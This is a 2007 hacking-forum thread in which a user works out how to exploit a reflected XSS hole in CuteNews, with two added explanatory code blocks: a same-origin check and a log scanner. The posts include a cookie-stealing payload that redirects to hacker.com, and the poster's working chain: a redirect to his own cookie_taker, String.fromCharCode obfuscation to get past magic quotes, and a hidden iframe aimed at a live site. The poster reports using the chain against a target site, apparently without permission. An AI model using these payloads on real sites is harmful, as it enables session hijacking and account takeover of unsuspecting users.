Retrieve data from another instance of Javascript
Date: March 22, 2007 02:33PM

Is it possible to retrieve data from another instance of Javascript? I know "x" versus "var x" is more global, but the following example didn't work.

<iframe src="http://example.com/page.php?varName=%3Cscript%3Ex=document.cookie%3C/script%3E">
<script>alert(x);</script>

Re: Retrieve data from another instance of Javascript
Posted by: Kyran
Date: March 22, 2007 02:37PM

I've never really played around with that.
It's a longshot, but does document.iframes[#].x work?

- Kyran

Re: Retrieve data from another instance of Javascript
Posted by: trev
Date: March 22, 2007 02:56PM

You cannot get JavaScript variables from a frame unless both your page and the frame are on the same host. Otherwise JavaScript communication across frames is forbidden (though generated events might do the trick. Edit: tested this - no, bubbling events don't go across frame boundaries either). Why do you need it? To send the cookie to yourself you would still need to trigger some URL from your server; you can do it inside the frame just as well.



Edited 1 time(s). Last edit at 03/22/2007 02:59PM by trev.

Re: Retrieve data from another instance of Javascript
Date: March 22, 2007 03:09PM

Hi Trev. I'm not sure how you meant that. I tried

<iframe src="http://example.com/page.php">
<script>
alert(document.cookie);
</script>
</iframe>

and it did not work for me. The only way I know is to write the AJAX as part of the URL's query string, but magic slashes are enabled on the website server and I think I need single quotes.



Edited 1 time(s). Last edit at 03/22/2007 03:28PM by digitalIllusionism.

Re: Retrieve data from another instance of Javascript
Date: March 22, 2007 04:17PM

I'm on the Wii right now so I can't play with it, but can't you target the document.scripts property on the frame and extract it that way? I'm not sure if it'll work, as it may violate the permissions aspect, but in theory it should work.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: Retrieve data from another instance of Javascript
Date: March 22, 2007 10:23PM

I'd have to see an example to understand the method you mean. Wouldn't it defeat the purpose of finding an injection if you could just access cookies of any embedded iframe?
I'm guessing the AJAX has to be part of the iframe URL query string.

Edit: It's a somewhat baseless guess though.



Edited 4 time(s). Last edit at 03/22/2007 10:33PM by digitalIllusionism.

Re: Retrieve data from another instance of Javascript
Posted by: hasse
Date: March 23, 2007 12:49PM

Hmm, I just remembered something I read about transferring data between domains using anchors (#), anyone remember what site that was on?

Re: Retrieve data from another instance of Javascript
Posted by: tx
Date: March 23, 2007 02:20PM

@hasse: http://sla.ckers.org/forum/read.php?2,6684,6766#msg-6766

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 03/23/2007 02:20PM by tx.

Re: Retrieve data from another instance of Javascript
Posted by: jungsonn
Date: March 23, 2007 09:45PM

@hasse

Do you mean the dojo toolkit crossdomain ajax requests?

Re: Retrieve data from another instance of Javascript
Posted by: trev
Date: March 23, 2007 10:32PM

digitalIllusionism, that's not how it works. An iframe has a window/document of its own; you don't have direct access to it. Your example would need to be changed like this:
<iframe src="http://example.com/page.php">
<script>
alert(frames[0].document.cookie);
</script>
</iframe>
But browsers forbid cross-domain access. The page cannot access the document from this frame unless the page is located on example.com as well. Note: not "www.example.com", not "something.example.com"; only "example.com" is allowed to access "example.com" - an exact match is required. More about the same-origin rule: http://www.mozilla.org/projects/security/components/same-origin.html

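The host-matching rule trev describes, written out as a check you can run. This is an added example, not code from the thread or from any browser; it uses the standard URL class (Node.js 10+ or any current browser), and the URLs in CASES are constructed, with example.com being the thread's own placeholder. It goes slightly beyond the post by also comparing scheme and port, which browsers include in the origin alongside the host.

```javascript
// Added example, not from the thread: makes the browser's same-origin rule for
// frame access explicit. The browser performs this comparison itself; the
// function only reproduces it so the host-matching point above can be checked.
// Uses the standard URL class (Node.js >= 10 and all current browsers).
const DEFAULT_PORTS = { 'http:': '80', 'https:': '443' };

// Returns the (scheme, host, port) triple that identifies an origin.
function originOf(urlString) {
  const u = new URL(urlString);
  const defaultPort = DEFAULT_PORTS[u.protocol];
  if (defaultPort === undefined) {
    throw new Error(`unsupported scheme: ${u.protocol}`);
  }
  // The URL parser already drops an explicit default port, so u.port is ""
  // for http://example.com:80/; fill it back in to compare explicitly.
  return { scheme: u.protocol, host: u.hostname, port: u.port || defaultPort };
}

// Same-origin check: all three components must match exactly. The path and
// query play no part, and "www.example.com" is a different host from
// "example.com" (no suffix matching, as the post above states).
function sameOrigin(parentUrl, frameUrl) {
  const a = originOf(parentUrl);
  const b = originOf(frameUrl);
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// Table of (embedding page, framed page) pairs and whether script in the
// embedding page may read frames[0].document from the framed page.
function frameAccessTable(pairs) {
  return pairs.map(([parent, frame]) => ({
    parent,
    frame,
    scriptAccess: sameOrigin(parent, frame),
  }));
}

// Constructed URLs for illustration; example.com is the thread's own placeholder.
const CASES = [
  ['http://example.com/index.html',      'http://example.com/page.php'], // same origin
  ['http://example.com:80/index.html',   'http://example.com/page.php'], // default port, still same
  ['http://www.example.com/index.html',  'http://example.com/page.php'], // different host
  ['https://example.com/index.html',     'http://example.com/page.php'], // different scheme
  ['http://example.com:8080/index.html', 'http://example.com/page.php'], // different port
  ['http://other.example/index.html',    'http://example.com/page.php'], // different site
];

if (typeof require !== 'undefined' && require.main === module) {
  console.table(frameAccessTable(CASES));
}
```

Only the first two rows come out with scriptAccess true; every other row is the situation the thread keeps running into, where the embedding page gets a window object for the frame but any read of its document is refused.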
Re: Retrieve data from another instance of Javascript
Date: March 24, 2007 02:50PM

@Trev
This testing has been done on Cutenews software. I can write HTML/Javascript to the page by passing it in through a GET variable.
Place I found vulnerability list.
In this thread, I asked what good injection could do and you said I could run the URL in a hidden iframe, and execute Javascript with the permissions of that user. If I can do that anyways just by going

<iframe src="http://example.com/page.php">
<script>
Javascript here;
Javascript here;
Javascript here;
</script>
</iframe>

then what advantage is there to injection?

I know there is a reason and it's my lack of understanding so thanks for explaining.

Re: Retrieve data from another instance of Javascript
Posted by: FR3DC3RV
Date: March 24, 2007 03:08PM

@digitalIllusionism
You can use an iframe in one site to retrieve the cookies of another site (or run code in that site as if you were the user).

-------------------------------
http://fr3dc3rv.blogspot.com

Re: Retrieve data from another instance of Javascript
Date: March 24, 2007 03:45PM

> You can use an iframe in one site to retrieve the cookies of another site.

How can I retrieve cookies from another site if cross-domain access is forbidden?

I can run Javascript as if I'm that user, sure, but what power does that give me? What security risk does that pose to them? If Javascript can't modify one of their existing files (maybe it can and I'm not aware), I'm not sure why they'd bother fixing it. I can alert myself. I can redirect myself. I can make animations that I see. I can see my own cookies. I can set cookies on my computer and so on, but what effect can that have on the site owner?
Of course, this is my lack of understanding again. Thanks for any answers.



Edited 3 time(s). Last edit at 03/24/2007 04:00PM by digitalIllusionism.

Re: Retrieve data from another instance of Javascript
Date: March 24, 2007 04:34PM

I'm not so sure I understood your last query (it was a long night), but if you're looking to be able to have more drastic effects such as modifying users' files and what-not, then you need to look into vulnerabilities for the browsers themselves and how they handle objects and files located in the operating system, so that you can embed some form of a third-party file, such as a trojan, to cause things to happen offline. I have many examples from back in 2004 where APPLET was embedded into pages, set up with a certain classid string, and then called via Javascript to execute registry changes. It seems like you're looking more for those effects, so the best thing to do is actively search out pages you know that contain working vulnerabilities, view the source remotely or use a client to request the data, and then analyze the scripts in question. Like I said, it was a long night, so if this is not what you're looking to do then disregard my comment.


Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
http://www.awesomeandrew.net/

Re: Retrieve data from another instance of Javascript
Date: March 24, 2007 05:40PM

Oh, no. When I said modify their files, I was referring to the website's files. In other words, I'd like to make it say, "Testing" on one of the regular site pages that everybody sees. I'd like to do something that defies the intended restrictions if cookie theft or gaining full permissions is not possible.

Re: Retrieve data from another instance of Javascript
Posted by: FR3DC3RV
Date: March 24, 2007 05:46PM

Yes, it's true that you can't pop up an alert box through an iframe; however, something like this will work:
XSS Code:
<script>location.href="h**p://www.hacker.com/code?"+document.cookie</script>

It will redirect the iframe to the www.hacker.com, and will send the cookies to the hacker's server.

> but what effect can that have on the site owner?
Pardon me if I don't get it.
If you are talking about a common user, you can use an iframe in a popular site that (using CSRF) defaces the content of the personal profile of that user.
If you are talking about the webmaster, you can't do much; however, you can deface lots of users' profiles.

>I can redirect myself. I can make animations that I see. I can see my own cookies.

You can redirect other users to other sites, you can make animations that other users see, and the user can see their cookies. It all depends on the type of XSS: if it is persistent, every time a user sees that page the javascript will run; if it is reflected, you will need to send an email with the link or create an iframe in another site.

EDIT: You posted faster than me.

-------------------------------
http://fr3dc3rv.blogspot.com



Edited 1 time(s). Last edit at 03/24/2007 05:49PM by FR3DC3RV.

Re: Retrieve data from another instance of Javascript
Date: March 24, 2007 08:27PM

I got it working.

Javascript fully works for my target site if it is injected via GET variable.

First I wrote what I wanted to run.
<script>c=escape(document.cookie);location.href="http://www.mysite.com/cookie_taker?varName="+c</script>

Then I had to evade magic slashes, so I used the XSS Cheat Sheet and went with
<script>document.write(String.fromCharCode(EXAMPLE,ABOVE,IN,DEC,FORMAT))</script>

Then I went with
<iframe src="http://cutenews_site.com?injectable_var=<script>document.write(String.fromCharCode(FIRST,EXAMPLE,IN,DEC,FORMAT))</script>" style="display:none;"></iframe>

It's probably old news for everyone but new and fun for me :=]
I incorporated ideas from this thread and learned a lot, especially the domain restriction part.
Thank you.

Edit: I forgot the = in the first URL.



Edited 1 time(s). Last edit at 03/25/2007 11:30AM by digitalIllusionism.

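From the defender's side, the requests FR3DC3RV's redirect payload and the String.fromCharCode version in the post above produce are visible in the target site's access log, provided the query string is decoded the same way the browser does. This added example (not code from the thread or from CuteNews) scans a few constructed Common Log Format lines: it URL-decodes each query, expands String.fromCharCode(...) calls into the characters they build, and reports which injection markers appear at any layer. The log lines, the page.php?varName= parameter (the thread's placeholder) and the host attacker.invalid are all constructed.

```javascript
// Added example, not from the thread: a server-side log check for the kind of
// request the posts above describe, i.e. script injected through a GET
// parameter and, in the last post, hidden behind String.fromCharCode to get
// past magic quotes. Every name below is constructed for illustration.

// Constructed access-log lines in Common Log Format; page.php?varName= is the
// thread's own placeholder and attacker.invalid is a reserved, non-resolving name.
const SAMPLE_LOG = [
  '10.0.0.5 - - [24/Mar/2007:20:27:01 +0000] "GET /index.php?id=12 HTTP/1.1" 200 5120',
  '10.0.0.7 - - [24/Mar/2007:20:27:05 +0000] "GET /page.php?varName=%3Cscript%3Ec%3Descape(document.cookie)%3Blocation.href%3D%22http://attacker.invalid/c%3Fv%3D%22%2Bc%3C/script%3E HTTP/1.1" 200 4096',
  '10.0.0.7 - - [24/Mar/2007:20:27:09 +0000] "GET /page.php?varName=%3Cscript%3Edocument.write(String.fromCharCode(60,115,99,114,105,112,116,62))%3C/script%3E HTTP/1.1" 200 4096',
  '10.0.0.9 - - [24/Mar/2007:20:28:00 +0000] "GET /about.php HTTP/1.1" 200 2048',
];

const REQUEST_RE = /"(?:GET|POST) (\S+) HTTP\/[\d.]+"/;

// Marker names and the pattern that identifies each one.
const MARKERS = [
  ['script-tag',           /<script/i],
  ['cookie-read',          /document\.cookie/i],
  ['redirect',             /location\.href/i],
  ['charcode-obfuscation', /String\.fromCharCode\s*\(/i],
];

// Pull the request target out of a log line, or null if the line is malformed.
function extractRequestPath(line) {
  const m = REQUEST_RE.exec(line);
  return m ? m[1] : null;
}

// decodeURIComponent throws on malformed escapes; a malformed query is still
// worth scanning, so fall back to the raw text instead of skipping the line.
function safeDecode(s) {
  try {
    return decodeURIComponent(s.replace(/\+/g, ' '));
  } catch (e) {
    return s;
  }
}

// Replace every String.fromCharCode(60,115,...) with the text it builds, so
// markers hidden in numeric form become visible to the regexes above.
function expandFromCharCode(s) {
  return s.replace(/String\.fromCharCode\s*\(([\d\s,]+)\)/g, (_, list) =>
    String.fromCharCode(
      ...list.split(',').map((n) => parseInt(n, 10)).filter((n) => !Number.isNaN(n))
    )
  );
}

// Returns null for a clean line, otherwise the path, the fully decoded query
// and the marker names that matched at any decoding layer.
function analyzeLine(line) {
  const path = extractRequestPath(line);
  if (path === null) return null;
  const q = path.indexOf('?');
  if (q < 0) return null; // no query string, nothing to inspect
  const raw = path.slice(q + 1);
  const decoded = safeDecode(raw);
  const expanded = expandFromCharCode(decoded);
  const layers = [raw, decoded, expanded];
  const hits = MARKERS
    .filter(([, re]) => layers.some((layer) => re.test(layer)))
    .map(([name]) => name);
  return hits.length > 0 ? { path, decoded: expanded, hits } : null;
}

// Scan a whole log and return one finding per suspicious line.
function scanLog(lines) {
  const findings = [];
  lines.forEach((line, i) => {
    const result = analyzeLine(line);
    if (result !== null) findings.push({ lineNo: i + 1, ...result });
  });
  return findings;
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of scanLog(SAMPLE_LOG)) {
    console.log(`line ${f.lineNo}: ${f.hits.join(', ')}\n  ${f.decoded}`);
  }
}
```

Running it flags lines 2 and 3 and leaves the ordinary requests alone; the second finding shows why the expansion step matters, since the raw log only contains digits where the second script tag ends up. The same decode-then-match approach works as a WAF rule, with the usual caveat that marker lists catch known shapes, not every encoding an injector can choose, so the fix that actually closes the hole is output encoding on the page that echoes the parameter.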
Re: Retrieve data from another instance of Javascript
Posted by: FR3DC3RV
Date: March 25, 2007 03:54AM

Nice.

-------------------------------
http://fr3dc3rv.blogspot.com

Re: Retrieve data from another instance of Javascript
Posted by: hasse
Date: March 25, 2007 05:04AM

@tx: I believe that was something other than what I was thinking about.

jungsonn Wrote:
-------------------------------------------------------
> @hasse
>
> Do you mean the dojo toolkit crossdomain ajax
> requests?

Yes, perhaps that was it. I found a page here that describes it:
http://tagneto.blogspot.com/2006/06/cross-domain-frame-communication-with.html



Edited 1 time(s). Last edit at 03/25/2007 05:05AM by hasse.

Re: Retrieve data from another instance of Javascript
Date: March 25, 2007 11:41AM

@Trev
I'm re-reading this thread and I see what you meant now. :=]



Edited 1 time(s). Last edit at 03/25/2007 11:41AM by digitalIllusionism.
